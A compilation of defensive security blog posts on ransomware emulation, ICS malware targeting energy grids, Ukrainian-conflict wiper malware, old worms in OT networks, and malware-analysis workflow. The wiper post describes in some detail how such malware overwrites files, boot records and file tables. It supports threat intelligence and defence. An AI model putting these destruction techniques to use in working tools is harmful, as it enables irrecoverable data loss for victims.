.themepack, .nls, .diagpkg, .msi, .lnk, .exe, .cab, .scr, .bat, .drv, .rtp, .msp, .prf, .msc, .ico, .key, .ocx, .diagcab, .diagcfg, .pdb, .wpx, .hlp, .icns, .rom, .dll, .msstyles, .mod, .ps1, .ics, .hta, .bin, .cmd, .ani, .386, .lock, .cur, .idx, .sys, .com, .deskthemepack, .shs, .ldf, .theme, .mpa, .nomedia, .spl, .cpl, .adv, .icl, .msu

Excessive file modifications to a variety of these file extensions within a very short time window would be an indicator of this impact activity occurring in your environment.

10b. Mitigation Policies

MITRE mitigation Recommendations for T1486:

M1040
M1053

In summary, AttackIQ’s new malware emulation attack graphs emulate core techniques and procedures designed into the malware as a crucial part of an adversary’s overall kill chain. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.

The post Announcing AttackIQ’s Malware Emulation Attack Graphs appeared first on AttackIQ.

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware.

And although we are more aware of threats than ever before, a future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, writes Jason Atwell, Principal Advisor of Global Intelligence at Mandiant.

Shortly before Christmas in 2015 the power grid in Ukraine suffered a series of outages that impacted roughly a quarter of a million consumers and lasted several hours.[1] Later, in 2017 the same group used ransomware to shutdown servers all over Ukraine, including at the infamous Chernobyl Nuclear Power Plant.[2] The actor behind this attack was a Russian state-sponsored group known as “Sandworm.” Because of the role this group has played in defining the scope and threat from cyber actors to power grids, cyber professionals and intelligence analysts around the globe have been watching keenly for any evidence of the group’s current activity during the current crisis in Ukraine.

Sandworm might be the most infamous group currently known for ICS malware, or malware that is intended specifically to target industrial control systems (ICS) such as programmable logic controllers (PLCs) or unified architecture (UA) servers. This type of malware, while still relatively rare, is more common now than a decade ago, and is increasingly proven capable of achieving dangerous and widespread effects on targeted networks globally.

Ukraine has had the unfortunate distinction of being the place where one of the most noteworthy incidents involving such malware has occurred, but it is far from the only one, and will not be the last to deal with incidents involving it. As anyone who works in the overlapping fields of cyber and engineering knows, it isn’t necessarily the threats or failures you’ve identified that will hurt you, it might be the ones no one has thought of.

The Russian focus on Ukraine’s power grid in particular, and how it has evolved over time, offers valuable lessons for network defenders and industrial engineers as they prepare grids to be resilient against future attacks of this kind.

Have you read:Water utility attacked by sophisticated timed malwareEuropean water utility attacked by cryptocurrency mining malwareNo green grid without cybersecurity

Exploration of energy sector significance

It is no mistake that most of the discovered ICS malware targets energy, or energy-related, functions and systems. When keeping in mind the intended effects, and the state-sponsored groups behind these capabilities, energy becomes a logical target for ICS malware. Energy plays a critical role in the dynamics of international geopolitics. When nation-states confront one another, the energy sector is often at the center of tensions.

This is because of the critical role energy plays in several key factors, such as internal stability through essential services, economic health due to the huge role oil and gas play in many economies, the effects of compliance that can be achieved when crucial suppliers deny or fail to deliver fuel, and finally it is a rapidly digitizing industry on the forefront of competition between the world’s great powers, making it a fertile ground for testing cyber capabilities in a way that sends a quick and direct message.

Besides Ukraine, Saudi Arabia has experienced cyber attacks directed against its energy sector, ones which were both destructive and highly creative in their methodology. Triton malware, which incidentally is also linked to Russia, was used to attempt to cause physical damage at a Saudi petrochemical company by disabling key safety systems, specifically the hardware and software platform used to coordinate across multiple devices.

This focus on eliminating the monitoring, coordination, and redundancy that is essential to modern safety systems could have made the impact of this attack devastating had it fully succeeded. Despite failing, it is understandable why such an attack could benefit a country like Russia, which was assessed to be behind Triton malware and subsequently sanctioned for its development.[3] Russia is in the top tier of nations that both profit from, and are largely dependent on, the energy market.

In past wars the bombing of oil and gas facilities were priority efforts, in future wars the same effects[4] might be achievable from afar using a network connection and a custom malware kit, helping decrease the risk to the attacker and increasing the speed and scale of destruction.

Discussion of malware functions and effects

One of the most significant recent developments in ICS malware was the proactive detection and mitigation of a campaign designed to use INCONTROLLER malware to target machine automation devices, specifically those able to interact with specific industrial equipment leveraged across multiple industries. The desired goal apparently being to interact with that equipment in such a way as to disable safety features, similar to Triton previously discussed above.[5]

Have you read:HBKU and Iberdrola collaborate on smart grid cybersecurityDOE funnels $12m to enhance US energy systems’ cybersecurity

Future Scenarios

Russia’s attempts to take out critical components of the electrical grid using cyber attacks may have been limited in scope and mostly unsuccessful, especially in terms of Ukraine’s ability to quickly recover, but they do show us where ICS malware and its capabilities are headed in the future. Like many other kinds of malware, ICS malware is increasingly focused on infiltrating the commonalities across systems and networks in order to have the greatest chance of exploitation and success.

That means a focus on widely adopted technology, the coding language used to communicate between them, and the software suites that enable multiple processes. In the future, because malicious actors are increasingly aware of what these critical nodes and common overlays are, attacks will be even more stealthy in how they infiltrate supply chains and achieve effects rapidly, both using our engineering processes against us and taking into account detection and response capabilities.

Mitigation

From an engineering perspective, there are some basic concepts that can help address the rising threat posed by ICS-specific malware. Additionally, the cyber security field is heavily engaged in hardening ICS networks and responding to incidents when they occur. Marrying these parallel efforts is an important part of having a strategic approach to this issue.

First, the earlier in a design process that cyber security can be addressed, the better. A resilient design should include not only redundancies, but ways to check if those redundancies are balancing one another effectively. This eliminates a vector for a bad actor to use safety processes against the system.

Second, operating procedures, either in design or in practice, should include the necessary time and resources to review data and indicators for signs of malicious activity. This includes updates, maintenance, and tests. Malicious activity may not be detectable, even on a secured network, if too much trust is placed in “operations as usual” as an indicator of a secure system.

Sign up to our newsletter and stay informed

Third and final, supply chain issues, in terms of new procurement, upgrades and enhancements, should be addressed as part of the design and build of resilient networks. Reviewing code or hardware for faults or signs of manipulation should be just as important as checking the loads or capacities of more traditional equipment and physical plants. The strongest pipeline or best insulated cable in the world won’t do much good if it’s connected to a compromised piece of network hardware purchased from an entity at odds with the geopolitical stance of the buyer’s host nation or corporate structure. Threat intelligence and past incident case studies can be immensely useful in determining how best to address these three areas for consideration.

Conclusion

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware. This potential attack surface is complex and growing. The good news is we are more aware of threats than ever before, and the resources dedicated to addressing them are maturing and becoming more accessible. A future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, and probably sooner than later, but its actual outcome is largely up to us, not the attacker.

Jason Atwell

About the Author:

Jason Atwell is Principal Advisor of Global Intelligence at Mandiant. Atwell helps oversee the Strategic Intelligence & Government and Global Government Consulting practices. Atwell has over 18 years of experience in cyber and risk intelligence from across the military, government, and commercial sectors.

References

[1] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[2] https://www.independent.co.uk/tech/chernobyl-ukraine-petya-cyber-attack-hack-nuclear-power-plant-danger-latest-a7810941.html

[3] https://home.treasury.gov/news/press-releases/sm1162

[4] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[5] https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool

This article was originally published on Power Engineering.

cw-podcast-050422.jpg

An upswing in malware deployed against targets in Eastern Europe. Cozy Bear is typosquatting. CuckooBees swarm around intellectual property. Tracking the DPRK’s hackers. Quiet persistence in corporate networks. CISA issues an ICS advisory. Caleb Barlow on backup communications for your business during this period of “shields up.” Duncan Jones from Cambridge Quantum sits down with Dave to discuss the NIST algorithm finalist Rainbow vulnerability. And, hey, officer, honest, it was just a Squirtle….

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/86

Selected reading.

Update on cyber activity in Eastern Europe (Google) 

Multiple government hacking groups stay busy targeting Ukraine and the region, Google researchers say (CyberScoop)

Google: Nation-state phishing campaigns expanding to target Eastern Europe orgs (The Record by Recorded Future)

SolarWinds hackers set up phony media outlets to trick targets (CyberScoop) 

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse (Recorded Future) 

Experts discover a Chinese-APT cyber espionage operation targeting US organizations (VentureBeat)

Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason Nocturnus) 

Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques (Cybereason) 

Chinese hackers cast wide net for trade secrets in US, Europe and Asia, researchers say (CNN) 

Researchers tie ransomware families to North Korean cyber-army (The Record by Recorded Future)

The Hermit Kingdom’s Ransomware Play (Trellix)

New espionage group is targeting corporate M&A (TechCrunch) 

Cyberespionage Group Targeting M&A, Corporate Transactions Personnel (SecurityWeek) 

UNC3524: Eye Spy on Your Email (Mandiant) 

Yokogawa CENTUM and ProSafe-RS (CISA) 

Cops ignored call to nearby robbery, preferring to hunt Pokémon (Graham Cluley)

best_practices_OG.jpg

Executive summary

2022 has experienced an increase in the number of wiper variants targeting Ukrainian entities.
This blog post looks to explain how wipers work, what makes them so effective and provides a short overview of the most recent samples that appeared in the eastern Europe geopolitical conflict.

How does wiper malware work?

Wiper’s main objective is to destroy data from any storage device and make the information unavailable (T1485). There are two ways of removing files, logical and physical.

Logical file removal is the most common way of erasing a file, performed by users daily when a file is sent to (and emptied from) the Recycle bin, or when it is removed with the command line or terminal with the commands del/rm. This action deletes the pointer to the file but not the file data, making it recoverable with forensic tools as long as the Operative System does not write any other file in the same physical location.

However, malware wipers aim to make the data irrecoverable, so they tend to remove the data from the physical level of the disk. The most effective way to remove the data/file is by overwriting the specific physical location with other data (usually a repeated byte like 0xFF). This process usually involves writing to disk several Gigabytes (or Terabytes) of data and can be time consuming. For this reason, in addition to destroying the data, many wipers first destroy two special files in the system:

The Master Boot Record (MBR), which is used during the boot process to identify where the Operative System is stored in the disk. By replacing the MBR, the boot process crashes, making the files inaccessible unless forensic methodologies are used.
The Master File Table (MFT) is exclusive to NTFS file systems, contains the physical location of files in the drive as well as logical and physical size and any associated metadata. If big files need to be stored in the drive, and cannot use consecutive blocks, these files will have to be fragmented in the disk. The MFT holds the information of where each fragment is stored. Removing the MFT will require the use of forensic tools to recover small files, and basically prevents recovery of fragmented files since the link between fragments is lost.

The main difference between wipers and ransomware is that it’s impossible to retrieve the impacted information after a wiper attack. Attackers using wipers do not usually target financial reward but intend to disrupt the victim’s operations as much as possible. Ransomware operators aim to get a payment in exchange for the key to decrypt the user’s data.

With both wiper and ransomware attacks, the victim depends on their back up system to recover after an attack. However, even some wiper attacks carry ransom notes requesting a payment to recover the data. It is important that the victim properly identifies the attack they’ve suffered, or they may pay the ransom without any chance of retrieving the lost data.

In the last month and a half, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks (T1499) to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time. Some of the wipers observed in this timeframe have been: WhisperKill, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero Wiper and AcidRain.

Most recent wiper examples

WhisperKill

On January 14, 2022, the Ukrainian government experienced a coordinated attack on 22 of their government agencies, defacing their websites. Almost all the compromised websites were developed by the same Ukranian IT company, Kitsoft, and all of them were built on OctoberCMS. Therefore, the attack vector was most probably a supply chain attack on the IT provider, or an exploitation of an OctoberCMS vulnerability, combined with exploitations of Log4Shell vulnerability (T1190).

defaced Ukrainian website

Figure 1. Example of defaced Ukrainian government website.

In addition to the website defacement, Microsoft Threat Intelligence Center (MSTIC), identified in a report destructive malware samples targeting Ukrainian organizations with two malware samples. Microsoft named the samples WhisperGate, while other security companies labeled the downloader as WhisperGate and WhisperKill as the actual wiper, which was considered a component of WhisperGate.

The identified files were:

Stage1 replaces the Master Boot Record (MBR) with a ransom note when the system is powered down, deeming the machine unbootable after that point. When booted up, the system displays Figure 2 on screen. Despite the ransom request, the data will not be recoverable since all efforts made by WhisperKill are looking to destroy data, not encrypt it. In this case, the wallet is most probably an attempt to decoy attribution efforts.

wiper ransom note

Figure 2. Ransom note obtained by MSTIC.

Stage 2 attempts to download the next stage malware (T1102.003) from the Discord app, if unsuccessful, it sleeps and tries again. The payload downloaded from the messaging app destroys as much data as possible by overwriting certain file types with 0xCC for the first MB of the file. Then it modifies the file extension to a random four-byte extension. By selecting the file types to be wiped and only writing over the first MB of data, the attackers are optimizing the wiping process. This is due to not wasting time on system files and only spending the necessary time to wipe each file, rapidly switching to the next file as soon as the current one is unrecoverable. Finally, the malware executes a command to delete itself from the system (T1070.004).

HermeticWiper

A month after, on February 23rd 2022, ESET Research reported a new Wiper being used against hundreds of Ukrainian systems. The wiper receives its name from the stolen certificate (T1588.003) it was using to bypass security controls “Hermetica Digital Ltd” (T1588.003). According to a Reuters article, the certificate could have also been obtained by impersonating the company and requesting a certificate from scratch.

hermetica certificate

Figure 3. Hermetica Digital Ltd certificate.

The attackers have been seen using several methods to distribute the wiper through the domain, like: domain Group Policy Object (GPO) (T1484.001), Impacket or SMB (T1021.002) and WMI (T1047) with an additional worm component named HermeticWizard.

The wiper component first installs the payload as a service (T1569.002) under C:Windowssystem32Drivers. Afterwards, the service corrupts the first 512 bytes of the MBR of all the Physical Drives, and then enumerates their partitions. Before attempting to overwrite as much data as the wiper can it will delete key files in the partition, like MFT, $Bitmap, $LogFile, the NTUSER registry hive (T1112) and the event logs (T1070.001).

On top of deleting key file system structures, it also performs a drive fragmentation (breaking up files and segregating them in the drive to optimize the system’s performance). The combination of the file fragmentation and the deletion of the MFT makes file recovery difficult, since files will be scattered through the drive in small parts – without any guidance as to where each part is located.

Finally, the malware writes randomized contents into all occupied sectors in the partition in an attempt to remove all potential hope of recovering any data with forensic tools or procedures.

IsaacWiper

A day after the initial destructive attack with HermeticWiper, on February 24th, 2022, a new wiper was used against the Ukrainian government, as reported by ESET, without any significant similarities to the HermaticWiper used the day before.

IsaacWiper identifies all the physical drives not containing the Operative System and locks their logical partitions by only allowing a single thread to access each of them. Then it starts to write random data into the drives in chunks of 64 KB. There is a unique thread per volume, making the wiping process very long.

Once the rest of the physical drives and the logical partitions sharing physical drive with the Operative System’s volume have been wiped, this last volume is wiped by:

Erasing the MBR.
Overwriting all files with 64 KB chunks of random data with one thread.
Creating a new file under the C drive which will be filled with random data until it takes the maximum space it can from the partition, overwriting the already overwritten existing files. This process is performed with a different thread, but it would still take a long time to write the full partition since both concurrent threads are actually attempting to write random data on the full disk.

Isaacwiper strings

Figure 4. IsaacWiper strings.

When comparing IsaacWiper to WhisperKill, the attackers’ priorities become clear. WhisperKill creators prioritized speed and number of affected files over ensuring the full drive is overwritten, since only 1 MB of each file was overwritten. On the other hand, IsaacWiper creators gave total priority to deliver the most effective wiper, no matter how long it takes to overwrite the full physical disk.

AcidRain

On the same day IsaacWiper was deployed, another wiper attacked Viasat KA-SAT modems in Ukraine, this time with a different wiper, named AcidRain by SentinelLABS. This wiper was particularly aimed at modems, probably to disrupt Internet access from Ukraine. This new wiper showed similarities to previously seen botnets targeting modems using VPNFilter. It was used in 2018, targeting vulnerabilities in several common router brands: Linksys, MikroTik, NETGEAR, and TP-Link. Exploiting vulnerabilities allowed the attackers to obtain Initial Access inside all types of networks, where the bot would search for Modbus traffic to identify infected systems with Industrial Control Systems (ICS).

The wiper used was the ELF MIPS wiper targeting Viasat KA-SAT modems, which aimed to firstly overwrite any file outside of the any common *nix installation: bin, boot, dev, lib, proc, sbin, sys, sur, etc. to then delete data from /dev/.

CaddyWiper

The first version of CaddyWiper was discovered by ESET researchers on 2022-03-14 when it was used against a Ukrainian bank. This new wiper variant does not have any significant code similarities to previous wipers. This sample specifically sets an exclusion to avoid infecting Domain Controllers in the infected system. Afterwards, it targets C:/Users and any additional attached drive all the way to letter Z:/ and zeroes all the files present in such folders/drives. Finally, the extended information of the physical drives is destroyed, including the MBR and partition entries.

A variant of CaddyWiper was used again on 2022-04-08 14:58 against high-voltage electrical substations in Ukraine. This latest version of the wiper was delivered together with Industroyer2, an evolution of Industroyer, which has the main functionn being to communicate with industrial equipment. In this case, the wiper was used with the purpose of slowing down the recovery process from the Industroyer2 attack and gaining back control of the ICS consoles, as well as covering the tracks of the attack. According to Welivesecurity, who have been cooperating with CERT-UA in this investigation, the Sandworm Team is behind this latest attack.

In this same attack against the energy station in Ukraine, other wiper samples for Linux and Solaris were observed by WeliveSecurity. These wipers leverage the shred command if present, otherwise they use the basic dd or rm commands to wipe the system.

DoubleZero wiper

On March 22, 2022 CERT-UA reported a new wiper used against their infrastructure and enterprises. Named DoubleZero, the wiper was distributed as a ZIP file containing an obfuscated .NET program. The wiper’s routine sets a hardcoded list of system directories, which are skipped during an initial wiping targeting user files. Afterwards, the skipped system directories are targeted and finally the registry hives: HKEY_LOCAL_MACHINE (containing the hives Sam, Security, Software and System), HKEY_CURRENT_USER and HKEY_USERS.

There are two wiping methods, both of which zero out the selected file.

doublezero wiper

Figure 5. DoubleZero first wiping function.

Conclusion

As we have seen in the examples above, the main objective of the attackers behind wipers is to destroy all possible data and render systems unbootable (if possible), potentially requiring a full system restore if backups aren’t available. These malware attacks can be as disruptive as ransomware attacks, but wipers are arguably worse since there is no potential escape door of a payment to recover the data.

There are plenty of ways to wipe systems. We’ve looked at 6 different wiper samples observed targeting Ukranian entities. These samples approach the attack in very different ways, and most of them occur faster than the time required to respond. For that reason, it is not effective to employ detection of wiper malware, as once they are in the system as it is already too late. The best approach against wipers is to prevent attacks by keeping systems up to date and by increasing cybersecurity awareness. In addition, consequences can be ameliorated by having periodic backup copies of key infrastructure available.

Associated indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the following OTX Pulses:

WhisperKill
HermeticWiper and IsaacWiper
AcidRain
CaddyWiper
DoubleZero

Please note, the pulses may include other activities related but out of the scope of the report.

TYPE

INDICATOR

DESCRIPTION

SHA256

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

WhisperKill (stage1.exe)

SHA256

dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78

WhisperKill (stage2.exe)

SHA256

0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da

HermeticWiper

SHA256

1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591

HermeticWiper

SHA256

13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033

IsaacWiper

SHA256

9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a

AcidRain

SHA256

47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6

AcidRain

SHA256

Fc0e6f2effbfa287217b8930ab55b7a77bb86dbd923c0e8150551627138c9caa

CaddyWiper

SHA256

7062403bccacc7c0b84d27987b204777f6078319c3f4caa361581825c1a94e87

Industroyer2

SHA256

3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe

DoubleZero

SHA256

30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a

DoubleZero

 

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0001: Initial Access

T1190: Exploit Public-Facing Application

TA0002: Execution

T1047: Windows Management Instrumentation
T1569: System Services

T1569.002: Service Execution

TA0008: Lateral Movement

T1021: Remote Services

T1021.002: SMB/Windows Admin Shares

TA0005: Defense Evasion

T1070: Indicator Removal on Host

T1070.004: File Deletion
T1070.001: Clear Windows Event Logs

T1112: Modify Registry
T1484: Domain Policy Modification

T1484.001: Group Policy Modification

TA0011: Command and Control

T1102: Web Service

T1102.003: One-Way Communication

TA0040: Impact

T1485: Data Destruction
T1499: Endpoint Denial of Service

TA0042: Resource Development

T1588: Obtain Capabilities

T1588.003: Code Signing Certificates

Car-Factory-Professional-Male-Automotive

This post was written with contributions from IBM Security’s Sameer Koranne and Elias Andre Carabaguiaz Gonzalez.

Operational technology (OT) — the networks that control industrial control system processes — face a more complex challenge than their IT counterparts when it comes to updating operating systems and software to avoid known vulnerabilities. In some cases, implementation of a patch could lead to hours or days of costly downtime. In other cases, full mitigation would require net new purchases of potentially millions of dollars worth of machinery to replace already functional systems simply because they are timeworn.

It’s no secret OT systems face this conundrum — and it’s become increasingly obvious cyber criminals are aware of this weakness, too. While there’s no shortage of recent headlines decrying the vulnerability of these systems to the more sophisticated malware commonly used by threat actors today, those conversations have overlooked another potential — yet equally serious — threat to OT: older malware still floating in the ether.

This is malware for which most systems have been patched and protected against, immunizing large swaths of networks and effectively dropping the older malware from the radar of IT teams (and headlines). Two examples of this kind of older malware include Conficker and WannaCry.

While occurrences of these malware types plaguing OT environments are relatively rare, they do occur — and often leave organizations combating a threat that was largely forgotten.

WannaCry: The Scourge of 2017… and Beyond

The WannaCry ransomware outbreak was a watershed for cybersecurity professionals in 2017 — a moment in time many in this industry will never forget. The fast-spreading worm that leveraged the Eternal Blue exploit ended up affecting more than 200,000 devices in over 150 countries. From X-Force’s perspective, WannaCry is the ransomware type they have most commonly seen at organizations with OT networks since 2018 — and, occasionally, WannaCry will even migrate into OT portions of the network itself.

One example of WannaCry infecting an OT network is Taiwan Semiconductor Manufacturing Company (TSMC) in 2018. Despite having robust network segmentation and cybersecurity practices in place, human error led to a vendor installing a software update on the OT portion of the network using a machine unknowingly infected with WannaCry ransomware. Because the laptop used for the software installation had been patched and was using an up-to-date operating system, it was not susceptible to the ransomware — but the OT network, on the other hand, was very susceptible.

The WannaCry ransomware spread quickly across TSMC’s network and infected several systems, since the OT network included multiple unpatched Windows 7 systems. The ransomware affected sensitive semiconductor fabrication equipment, automated material handling systems, and human-machine interfaces. It also caused days of downtime estimated to cost the company $170 million. CC Wei, the CEO of the company, said in a statement, “We are surprised and shocked. We have installed tens of thousands of tools before, and this is the first time this happened.” As a result of the incident, the company implemented new automated processes that would be less likely than human error to miss a critical security step.

WannaCry continues to affect organizations with OT networks, although — thankfully — X-Force observes such incidents much less frequently today than they did in 2018 and 2019, as many organizations are able to apply patches or identify workarounds to more effectively insulate networks from WannaCry.

Enter Conficker: Continuing to Emerge in 2021

An old worm — even older than WannaCry — that X-Force has observed on OT networks in 2021, however, is Conficker. This worm emerged in late 2008 as threat actors quickly leveraged newly released vulnerabilities in Microsoft XP and 2000 operating systems. Conficker seeks to steal and leverage passwords and hijack devices running Windows to run as a botnet. Because the malware is a worm, it spreads automatically, without human intervention, and has continued to spread worldwide for well over a decade.

Conficker — sometimes with different names and variants — is still present in some systems today, including in OT environments. As with WannaCry, the presence of legacy technologies and obsolete operating systems — including Windows XP, Windows Server 2003, and proprietary protocols that are not updated or patched as often as their IT network counterparts — make these environments especially vulnerable to Conficker. In addition, many legacy systems have limited memory and processing power, further constraining administrators’ ability to insulate them from infections such as Conficker or WannaCry, as the system will not even support a simple antivirus software installation.

The Conficker worm is particularly effective against Windows XP machines, especially unpatched versions, which are common in OT environments. The fast-spreading nature of the Conficker worm can be a challenge for network engineers — once infected, every Windows machine connected to the network could be impacted in as little as one hour. Since many OT environments are built on 20- to 30-year-old designs, partially modified to have connectivity for ease of access, it provides the ideal environment for even the simplest malware, Conficker included.

From Conficker infections X-Force has observed, the worm is able to affect human machine interfaces (HMIs), which have transmitted network traffic initially alerting security staff of the infection. X-Force malware reverse engineering of the Conficker worm indicates that it exploits the MS08-067 vulnerability to initially infect the host. Fortunately, in some cases Conficker malware — even when present in OT environments — has not led to operational damage or product quality degradation. Of course, this may not be the case for all network architectures on which Conficker malware may appear.

Defending OT Networks from Old Malware: Lessons From the Trenches

Even though many OT environments are running obsolete software and network topographies, there are measures organizations can take to defend against older malware strains such as WannaCry and Conficker. Often, the highest priority in an OT environment is maximizing uptime, leaving little room for maintenance, re-design, updates and their associated downtime. Yet even within these confines, there are many measures organizations can take to decrease the opportunities for old malware to get onto, spread within, and negatively affect their network.

Some of these include:

1. Network segmentation: Micro-segment the networks within an OT environment. If different lines do not need to communicate with each other, there is no need to create and maintain a large network subnet for all systems. Improve reliability of systems by segregating those in smaller subnets and restricting traffic at boundaries. In addition, an industrial demilitarized zone (iDMZ) is your best ally for compartmentalization and network segmentation. Avoid dynamic host configuration protocol (DHCP) as much as possible; should you be required to use it, subnet it to the lowest possible net mask. Configure virtual local area networks (VLANs) if possible.

2. Know what you have: Systems older than 20 years probably do not have a good electronic record in a configuration management database (CMDB) and may be missing or have outdated network drawings. Reverse engineering this information during an incident is not productive, and ensuring assets and network information is maintained accurately can go a long way. Be aware of the IPs, MACs, operating systems, and software licenses in your asset inventory. Get to know your environment up to the revision date of your software. Make clear which users are allowed to log on to machines based on specific roles; if possible, link users to a machine’s serial number.

3. Harden legacy systems to maintain a secure configuration: Remove all unused users and revoke all unnecessary administrative privileges, remove all unused software, disable all unused ports (running a packet capture can help), and prohibit using these assets for personal use. Insecure configuration of endpoints can leave open vulnerabilities for exploitation by adversaries or self-propagating malware. Identify unused and unwanted applications and delete them to reduce the attack surface. Avoid proprietary protocols as much as possible, unless they are constantly updated; check for and use better, newer protocols that are standardized.

4. Continuous Vulnerability Management: A vulnerability management program allows organizations to reduce the likelihood of vulnerability exploitation and unauthorized network access by a malicious actor and is necessary to make informed vulnerability treatment decisions based on risk appetite and regulatory compliance requirements. All necessary security and safety relevant patches must be applied as soon as feasible. If it is not possible to patch the system, ensure other compensating security controls are implemented to reduce the risk. Identify the lowest demand times in a day or week and commit to having downtime and maintenance windows for patching and updating. Routinely check for advisories on ICS-CERT and note whether your vendors are impacted.

5. Reduce SMB Attack Surface: Both WannaCry and Conficker are known to exploit SMB. Server Message Block (SMB) is a network communication protocol used to provide shared access to services on a network, such as file shares and printers. Because of its prevalence in information technology environments, adversaries commonly use this protocol to move laterally within a compromised environment, interact with remote systems, deploy malware, and transfer files. Moreover, SMB can provide a convenient way to bypass Multi-Factor Authentication (MFA) and remotely execute code. To reduce the attack surface and the overall risk associated with SMB-based lateral movement, consider the following hardening measures:

Configure Windows firewall to DENY all inbound SMB communications to workstations. This control will disable inbound connections on TCP ports 139 and 445.
Audit server SMB requirements and explicitly DENY SMB inbound on servers that do not require the protocol as part of their functionality.
Consider disabling legacy versions of the SMB protocol and migrating business applications to SMB v3.1. This activity requires careful planning and risk evaluation due to its potential impact on business operations.

6. Avoid the use of Portable Media: Uncontrolled portable media significantly increase the risks to the legacy OT environments, as OT systems may not have the latest security patches to defend against newer attack methodologies. Uncontrolled and unsecured allowance of portable media can expose an OT network to exploits and unplanned outages and downtime.

Have a security policy for secure use of portable media in OT environments.
Ideally, strictly prohibit use of USB flash drives. Should there be an absolute necessity of using one, designate a single USB stick for any maintenance and re-format it every time you use it.
Implement processes and technical controls that adequately support the security policy requirements. Controls may include, but are not limited to the following:
Every use of the device is documented in the logbook
The devices are scanned on designated quarantine PCs to ensure robust AV scan before using on OT endpoints. Ensure that anti-malware software is configured to automatically scan portable media
Control the number of portable media devices approved to be used in the environment
Disable autorun and autoplay auto-execute functionality for removable media.

Consider implementing Secure Media Exchange solutions such as Honeywell SMX or OPSWAT MetaDefender.

7. Rehearse Disaster Recovery (DR) and Incident Response (IR) scenarios regularly: DR plans should be documented, reliable backups should be available, and OT personnel must have an understanding and intimate knowledge of how the system should be recovered. IR and DR exercises should be conducted regularly to build the muscle memory needed for reliable recovery. Educate your team about imminent security threats and make them part of the security process. As part of any plan, have a direct line with your organization’s CSIRT: your best play is always a fast response and a transparent environment, so be organized and report everything.

8. Employ network monitoring solutions: Firewalls, Access Control Lists (ACLs) and Intrusion Prevention Systems (IPS) can assist in keeping a close eye on traffic traversing your network. Check for new nodes or machines communicating with suspicious assets. If you employ an intrusion detection system (IDS), ensure your signatures are up to date. Even when monitoring for old malware, new signatures appear every day.

While it isn’t common for an OT network to be infected with older malware like WannaCry or Conficker, documented cases do indeed exist, and they can leave costly destruction and even safety consequences in their wake.

To learn how X-Force can keep your network safer, download the X-Force for OT solution brief.

Read the 2022 X-Force Threat Intelligence Index Report to understand the latest OT Threats

The post Where Everything Old is New Again: Operational Technology and Ghost of Malware Past appeared first on Security Intelligence.

Analyzing New Malware

In the ever-changing world of cybersecurity, new threats appear and evolve on a regular basis. Sharing information about them is an important part of fighting cybercrime and keeping people and organizations safe. To do so efficiently, being prepared will make the best use of your—and your team’s—time when analyzing an emerging threat.

In this blog, we cover various situations that researchers encounter when they need to publish their findings and provide some suggestions on how to approach them, along with a suggested workflow for approaching the analysis most efficiently. Finally, we apply this strategy to analyze a ransomware sample.

Efficient analysis of new executable samples is extremely important when sharing information on evolving threats

Efficient analysis is extremely important when investigating new malware.

Challenges and Solutions

When a new threat emerges, there are a few common challenges that researchers face during analysis. Here are a few ways to handle them so you can produce clear and purposeful findings.

Urgency

In many cases, there is a relatively narrow window of time in which to release the publication, if we want the topic to be hot and the corresponding material to be relevant.

The solution is to focus on the most important questions that need answers.

Who are the potential readers of the article? How will they benefit from reading it?
How will the time costs associated with each section compare to its benefits?

Beginning your work by answering these questions will help shape the material in the right direction and manage time properly.

Novelty

For many attacks that hit the news, the related malware may not yet have been analyzed by other researchers. This increases the amount of work required to understand all parts of the relevant functionality, as there is little to no information to use as a starting point.

To address this issue, it is worth remembering that in many cases, modern malware families and attacker groups already have some roots. Tracking these connections allows researchers to find previous iterations of similar projects and reduce the amount of time required to understand malware’s functionality.

Complexity

The consequences of simple cyberattacks aren’t generally big enough to attract the attention of the public. What that means for researchers is that if something is worth writing an article about, it’s likely to be quite complex and therefore time-consuming to analyze.

The solution here might be to split the big task into smaller tasks. Apart from prioritizing based on the article’s focus, it also allows the analysis to done by a group, with different people focusing on different parts of functionality. Exchanging knowledge on a regular basis about what has already been covered will help the team to be efficient and not waste time analyzing the same parts multiple times.

Suggested Workflow

Here is a common workflow that should allow researchers to approach the analysis of new executable samples efficiently and effectively.

The second step, Behavioral Analysis, refers to the blackbox-style analysis that generally involves the execution of a sample under various monitoring tools and on sandboxes. The Dynamic Analysis step refers the use of a debugger to execute instructions.

Steps

Actions

1. Triage

